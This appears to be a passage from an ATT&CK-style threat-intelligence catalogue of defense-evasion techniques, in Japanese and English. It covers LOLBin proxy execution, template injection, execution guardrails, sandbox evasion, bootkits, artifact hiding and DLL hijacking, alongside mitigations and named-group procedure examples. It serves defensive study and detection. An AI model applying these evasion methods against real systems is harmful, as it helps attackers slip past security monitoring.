Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. The Odbcconf.exe binary may be digitally signed by Microsoft. 敵対者は、Regsvcs/Regasmを悪用してコードを実行することがある。Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. 敵対者は、Regsvr32を悪用してDLLを登録・実行することがある。Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. 敵対者は、Rundll32を悪用してDLLの関数を実行することがある。Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>). 敵対者は、Verclsidを悪用してコードを実行することがある。Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell. 敵対者は、Mavinjectを悪用してコードを注入・実行することがある。Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V). 敵対者は、MMC(Microsoft Management Console)を悪用してコードを実行することがある。Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt. MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration. 敵対者は、Electronアプリケーションを悪用してコードを実行することがある。Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams. Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS. The Chromium engine is used to display web content and Node.js runs the backend code. 危険なWebコンテンツへのアクセスを制限する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 システムバイナリによるプロキシ実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Lazarus Group lnk files used for persistence have abused the Windows Update Client (<code>wuauclt.exe</code>) to execute a malicious DLL. Volt Typhoon has used native tools and processes including living off the land binaries or “LOLBins" to maintain and expand access to the victim networks. 敵対者は、XSL変換を悪用して悪意あるスクリプトを実行し検知を回避することがある。 Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. 許可されていないコードの実行を防止する。 XSLスクリプト処理に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader. Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file. Higaisa used an XSL file to run VBScript code. Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. 敵対者は、文書テンプレートに悪意ある参照を注入して実行・回避を行うことがある。 Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 テンプレートインジェクションに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website. During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file. APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro. Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication. Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems. DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication. Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document. Inception has used decoy documents to load malicious remote payloads via HTTP. Confucius has used a weaponized Microsoft Word document with an embedded RTF exploit. MirrorFace has used remote template injection to retrieve malicious payloads from the C2. Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload. WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document. 敵対者は、特定環境でのみ実行されるよう制約を設けて分析を回避することがある。 Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses. 敵対者は、環境固有の値を鍵として復号/実行し、想定外環境での解析を回避することがある。Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment. 敵対者は、相互排他（ミューテックス）で多重実行や特定環境での実行を制御することがある。Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time. この技法は予防的統制での緩和が適切でない（検知に注力する）。 実行ガードレールに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Mustang Panda included the use of Cloudflare geofencing mechanisms to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations. Gamaredon Group has used geoblocking to limit downloads of the malicious file to specific geographic locations. APT-C-36 has used geolocation filtering in malware delivery to redirect traffic not coming from a targeted region or country, such as Ecuador or Colombia, to legitimate sites. BlackByte stopped execution if identified language settings on victim machines was Russian or one of several language associated with former Soviet republics. BlackByte has used ransomware variants requiring a key passed on the command line for the malware to execute. Contagious Interview has configured C2 endpoints to review IP geolocation, request headers, victim environment details and runtime conditions prior to delivering payloads. Anchor can terminate itself if specific execution flags are not present. SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values. BitPaymer compares file names and paths to a list of excluded names and directory names during encryption. Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met. EnvyScout can call <code>window.location.pathname</code> to ensure that embedded files are being executed from the C: drive, and will terminate if they are not. BoomBox can check its current working directory and for the presence of a specific file and terminate if specific values are not found. VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found. NativeZone can check for the presence of KM.EkeyAlmaz1C.dll and will halt execution unless it is in the same directory as the rest of the malware's components. Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list. Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line. DEADEYE can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain. DarkGate uses per-victim links for hosting malicious archives, such as ZIP files, in services such as SharePoint to prevent other entities from retrieving them. Raspberry Robin will check for the presence of several security products on victim machines and will avoid UAC bypass mechanisms if they are identified. Raspberry Robin can use specific cookie values in HTTP requests to command and control infrastructure to validate that requests for second stage payloads originate from the initial downloader script. Apostle's ransomware variant requires that a base64-encoded argument is passed when executed, that is used as the Public Key for subsequent encryption operations. If Apostle is executed without this argument, it automatically runs a self-delete function. LunarLoader can use the DNS domain name of a compromised host to create a decryption key to ensure a malicious payload can only execute against the intended targets. CHIMNEYSWEEP can execute a task which leads to execution if it finds a process name containing “creensaver.” ROADSWEEP requires four command line arguments to execute correctly, otherwise it will produce a message box and halt execution. BPFDoor creates a zero byte PID file at `/var/run/haldrund.pid`. BPFDoor uses this file to determine if it is already running on a system to ensure only one instance is executing at a time. ShrinkLocker will exit its "main" function if the victim domain name does not match provided criteria. Exbyte checks for the presence of a configuration file before completing execution. BlackByte Ransomware creates a mutex value with a hard-coded name, and terminates if that mutex already exists on the victim system. BlackByte Ransomware checks the system language to see if it matches one of a list of hard-coded values; if a match is found, the malware will terminate. StrelaStealer variants only execute if the keyboard layout or language matches a set list of variables. BOLDMOVE verifies it is executing from a specific path during execution. On macOS, LightSpy checks the existence of a process identification number (PID) file, `/Users/Shared/irc.pid`, to verify if LightSpy is currently running. Akira _v2 will fail to execute if the targeted `/vmfs/volumes/` path does not exist or is not defined. LockBit 2.0 will not execute on hosts where the system language is set to a language spoken in the Commonwealth of Independent States region. StealBit will execute an empty infinite loop if it detects it is being run in the context of a debugger. LockBit 3.0 can make execution dependent on specific parameters including a unique passphrase and the system language of the targeted host not being found on a set exclusion list. Sagerunex uses a "servicemain" function to verify its environment to ensure it can only be executed as a service, as well as the existence of a configuration file in a specified directory. RansomHub will terminate without proceeding to encryption if the infected machine is on a list of allowlisted machines specified in its configuration. TONESHELL has an exception handler that executes when ESET antivirus applications `ekrn.exe` and `egui.exe` are not found and directly injects its code into waitfor.exe using Native Windows API including `WriteProcessMemory` and `CreateRemoteThreadEx`. RedLine Stealer has built in settings to not operate based on geolocation or country of the victim host. Qilin can require a specific password to be passed by command-line argument during execution which must match a pre-defined value in the configuration in order for it to continue execution. SystemBC has checked if the last characters of DNS server names end in .bit before initializing C2 communication. SystemBC has identified running processes associated with anti-virus solutions to include `a2guard.exe` to determine whether it executes or not. evilginx2 can reject requests to phishing URLs if the User-Agent of the visitor doesn't match the allowlist REGEX filter for a specific lure. GlassWorm has utilized logic to avoid executing on Russian based devices. PureCrypter code contains an ExclusionRegionNames option where it can compare the results of `kernel32!GetGeoInfo` with a list of regions. LODEINFO can halt execution if the “en_US” locale is identified on a victim's machine. HiddenFace can check for the presence of specific analysis tools and will terminate itself if they are found. ROAMINGHOUSE can change its execution method to create a batch file in the startup folder that executes a legitimate executable if a McAfee product is detected. Tsundere Botnet has checked the victim machine’s location to avoid infecting in the Commonwealth of Independent States (CIS) region. LazyWiper can halt execution if `[System.Net.Dns]::GetHostName()` or `$env:COMPUTERNAME` contains `“pe-dc”`. 敵対者は、仮想環境やサンドボックスを検知して動作を変え分析を回避することがある。 Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. 敵対者は、システムの特徴を調べて仮想環境/サンドボックスを検知し動作を変えることがある。Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. 敵対者は、ユーザー活動の有無を調べてサンドボックスを検知することがある。Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. 敵対者は、時間ベースのチェックでサンドボックス分析を回避することがある。Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. 仮想化/サンドボックス回避に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host. Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection. Saint Bear contains several anti-analysis and anti-virtualization checks. Contagious Interview has requested victims to disable Docker and other container environments in attempts to thwart container isolation and ensure device infection. CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it. Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit. Pteranodon has the ability to use anti-detection functions to identify sandbox environments. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Bisonal can check to determine if the compromised system is running on VMware. Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. StoneDrill has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. IcedID has manipulated Keitaro Traffic Direction System to filter researcher and sandbox traffic. Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software. Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads. Bazar can attempt to overload sandbox analysis by sending 1550 calls to <code>printf</code>. Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes. Gelsemium can use junk code to generate random activity to obscure malware behavior. Kevin can sleep for a time interval between C2 communication attempts. Squirrelwaffle has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms. Bumblebee has the ability to perform anti-virtualization checks. Black Basta can make a random number of calls to the `kernel32.beep` function to hinder log analysis. Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment. StrelaStealer payloads have used control flow obfuscation techniques such as excessively long code blocks of mathematical instructions to defeat sandboxing and related analysis methods. XLoader can utilize decoy command and control domains within the malware configuration to circumvent sandbox analysis. RedLine Stealer has an anti-sandbox technique that requires the malware to consistently check with the C2 server, if the communication fails RedLine Stealer will not continue execution. 敵対者は、監視の薄い未使用クラウドリージョンを悪用して検知を回避することがある。 Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure. ソフトウェアを安全に構成し、悪用を防ぐ。 未使用/非サポートのクラウドリージョンに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、OS起動前のブート機構（ファームウェア/ブートキット等）を悪用して永続化することがある。 Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control. 敵対者は、システムファームウェアを改変して永続化や防御妨害を行うことがある。Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. 敵対者は、コンポーネントファームウェアを改変して永続化することがある。Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking. 敵対者は、ブートキットを用いて起動段階で永続化することがある。Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. 敵対者は、ROMMONを改変(ROMMONkit)してネットワーク機器で永続化することがある。Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. 敵対者は、TFTPブートを悪用してシステムイメージを改変・永続化することがある。Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワーク越しのリソースアクセスを制限する。 ブートの完全性を検証し、起動段階での改ざんを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 OS起動前ブートに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、ファイル・ユーザー・ウィンドウ等の成果物を隠蔽して検知を回避することがある。 Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. 敵対者は、隠しファイルやディレクトリを用いて成果物を隠蔽することがある。Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS). 敵対者は、隠しユーザーアカウントを用いて存在を隠蔽することがある。Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 敵対者は、隠しウィンドウを用いて活動を隠蔽することがある。Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 敵対者は、NTFSのファイル属性(ADS等)を悪用してデータを隠すことがある。Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). 敵対者は、隠しファイルシステムを用いてデータを隠蔽することがある。Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS. 敵対者は、仮想インスタンスを実行して活動を隠蔽することがある。Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values. 敵対者は、VBAストンピングでマクロのソースを隠すことがある。Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data. 敵対者は、メール隠蔽ルールを用いて活動を隠蔽することがある。Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> PowerShell cmdlets on Windows systems. 敵対者は、リソースフォークを悪用してデータを隠すことがある。Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code. Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder. 敵対者は、プロセス引数をスプーフィングして実体を隠すことがある。Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB. 敵対者は、プロセス割り込みを無視させて検知/停止を回避することがある。Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off. These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. 敵対者は、ファイル/パスを監視対象から除外させて隠蔽することがある。Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate. 敵対者は、バインドマウントを悪用してファイルを隠すことがある。Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. 敵対者は、拡張属性を悪用してデータを隠すことがある。Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`, `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 アーティファクトの隠蔽に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Remcos can modify file attributes to hide the file. OSX/Shlayer has used the <code>mktemp</code> utility to make random and unique filenames for payloads, such as <code>export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"</code> or <code>mktemp -t Installer</code>. Bundlore uses the <code>mktemp</code> utility to make unique file and directory names for payloads, such as <code>TMP_DIR=`mktemp -d -t x</code>. WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide its attempts to elevate privileges through `IFileOperation`. Tarrask is able to create “hidden” scheduled tasks by deleting the Security Descriptor (`SD`) registry value. DarkTortilla has used `%HiddenReg%` and `%HiddenKey%` as part of its persistence via the Windows registry. NOOPLDR can hide services used to aid execution. 敵対者は、プログラムの実行フロー（DLL探索順等）を乗っ取って悪意あるコードを実行することがある。 Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. 敵対者は、DLL探索順やサイドローディングを悪用して実行フローを乗っ取ることがある。Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking. 敵対者は、dylibハイジャックでmacOSの実行フローを乗っ取ることがある。Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. 敵対者は、実行可能インストーラのファイル権限の弱点を悪用することがある。Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. 敵対者は、動的リンカーを悪用して実行フローを乗っ取ることがある。Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library. 敵対者は、PATH環境変数を悪用してパスを横取りすることがある。Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. 敵対者は、検索順ハイジャックでパスを横取りすることがある。Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. 敵対者は、引用符なしパスを悪用してパスを横取りすることがある。Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. 敵対者は、サービスのファイル権限の弱点を悪用することがある。Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. 敵対者は、サービスのレジストリ権限の弱点を悪用することがある。Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through access control lists and user permissions. 敵対者は、COR_PROFILERを悪用して実行フローを乗っ取ることがある。Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. 敵対者は、KernelCallbackTableを悪用して実行フローを乗っ取ることがある。Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads. The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded. 敵対者は、AppDomainManagerを悪用して.NETの実行フローを乗っ取ることがある。Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 ライブラリのロードを制限し、不正なコード実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 UACを適切に構成し、権限昇格を防ぐ。 実行フローの乗っ取りに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries. Pikabot Distribution February 2024 utilized a tampered legitimate executable, `grepWinNP3.exe`, for its first stage Pikabot loader, modifying the open-source tool to execute malicious code when launched. Denis replaces the nonexistent Windows 